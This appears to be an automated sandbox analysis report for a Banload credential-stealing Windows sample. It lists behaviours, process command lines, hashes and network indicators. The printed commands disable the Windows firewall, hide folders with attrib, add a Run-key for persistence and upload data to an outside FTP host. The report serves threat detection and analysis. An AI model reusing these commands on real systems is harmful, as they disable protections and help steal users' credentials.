Analysis Overview
SHA256
f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19
Threat Level: Known bad
The file f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19 was found to be: Known bad.
Malicious Activity Summary
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets file to hidden
Modifies Windows Firewall
Executes dropped EXE
Reads user/profile data of local email clients
Reads local data of messenger clients
Reads user/profile data of web browsers
Checks computer location settings
Checks BIOS information in registry
Loads dropped DLL
Accesses Microsoft Outlook accounts
Adds Run key to start application
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Gathers network information
Views/modifies file attributes
NTFS ADS
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-09-12 03:23
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-12 03:23
Reported
2024-09-12 03:25
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Outlook Object Model Access" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Assembly = "Microsoft.Office.Interop.OutlookViewCtl, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\Class = "Microsoft.Office.Interop.OutlookViewCtl.ObjectModelCtlClass" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\OUTLCTL.DLL" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\InprocServer32 = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b004f00550054004c004f004f004b004e006f006e0042006f006f007400460069006c00650073003e00330038006f007300460024007d003500640039002d004c0064007d006100720025006f003000590000000000 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\RuntimeVersion = "v2.0.50727" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Class = "Microsoft.Office.Interop.OutlookViewCtl.ObjectModelCtlClass" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\RuntimeVersion = "v2.0.50727" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\Assembly = "Microsoft.Office.Interop.OutlookViewCtl, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\DllHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe
"C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
memory/2692-74-0x0000000000160000-0x0000000000162000-memory.dmp
memory/2308-73-0x0000000000360000-0x0000000000362000-memory.dmp
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 3599c797ad0bf899791bfa24413c3ab6 |
| SHA1 | 215a520638bb3f1336f268d1acc1170bf2ce0768 |
| SHA256 | 0a9963eefd15805efaef32bf961b354fc255a5a23b4d466aa8e94df53a3c3e8c |
| SHA512 | add003202c97629f2d87d4b7f1876d79dc1ae35cfc85fc55e578adbc3cc009e41ca42c66f33521acb5d8a651fe31d69de5699af1df82ada8227bbeeddbe8d5d1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 3351585db91521d6fa543490ac7cd6a5 |
| SHA1 | 9be2b3abf17613d7386f9949cabaedd466902e82 |
| SHA256 | 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4 |
| SHA512 | 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 75a35514185cd2c5cf5aab50cc380963 |
| SHA1 | f1ff1e088f910398a48f4f7dfddec24e6d6d1734 |
| SHA256 | 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937 |
| SHA512 | ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
memory/1496-123-0x0000000002440000-0x00000000026F4000-memory.dmp
memory/2552-126-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1496-124-0x0000000002440000-0x00000000026F4000-memory.dmp
memory/1916-130-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2552-129-0x0000000002670000-0x0000000002924000-memory.dmp
memory/1916-131-0x0000000002920000-0x0000000002B2C000-memory.dmp
memory/1916-135-0x0000000002920000-0x0000000002B2C000-memory.dmp
memory/1916-143-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1916-146-0x0000000002920000-0x0000000002B2C000-memory.dmp
memory/1916-145-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1916-144-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1916-142-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1916-150-0x0000000002920000-0x0000000002B2C000-memory.dmp
memory/1916-157-0x0000000002920000-0x0000000002B2C000-memory.dmp
memory/2552-159-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1496-164-0x0000000002440000-0x00000000026F7000-memory.dmp
memory/1644-166-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1496-163-0x0000000002440000-0x00000000026F7000-memory.dmp
memory/1940-170-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1644-168-0x0000000002570000-0x0000000002827000-memory.dmp
memory/1940-171-0x0000000002710000-0x000000000291C000-memory.dmp
memory/1940-175-0x0000000002710000-0x000000000291C000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | c2f09542b6c7daf4288f3524c8cebb18 |
| SHA1 | 9430b21baf07f0d105b9ee5fdd9f868418454517 |
| SHA256 | 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4 |
| SHA512 | dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672 |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | 784b21c7c353438e77ebdc7cb9705963 |
| SHA1 | 785a7c9866e7268aa1e3ba7799ed514750e636db |
| SHA256 | feb9bf2893c33236c799b308140c009945d6b6b0dd98ad743642f7e1c924c866 |
| SHA512 | 45021eb9059fadefcf7545c3885d4d558f332a961ccd1758ce360dd6c4b31e62b7b8956bb0d8aaafabf5c0b43872d3c1a38ec2cd0ac1afd09010ac5e35946581 |
C:\ProgramData\TEMP:663565B1
| MD5 | 858aefd1a82c3131ad02dd28c8c91d9a |
| SHA1 | 186d709fb5c394b57d35a62c98c5636a194040bc |
| SHA256 | 0cf1ee414b7f8950f83c251e26b7a8c12b7e0660f595161accdd24d685662c66 |
| SHA512 | d342fee13de36ae30e48060d59992507447712f2d68589b83379249acb2a9f9bddd17aa93e360da80eb9664fa40badececf5562b27c0b0e49414dc591f8abf5e |
memory/1940-186-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1940-188-0x0000000002710000-0x000000000291C000-memory.dmp
memory/1940-187-0x0000000000400000-0x00000000006B7000-memory.dmp
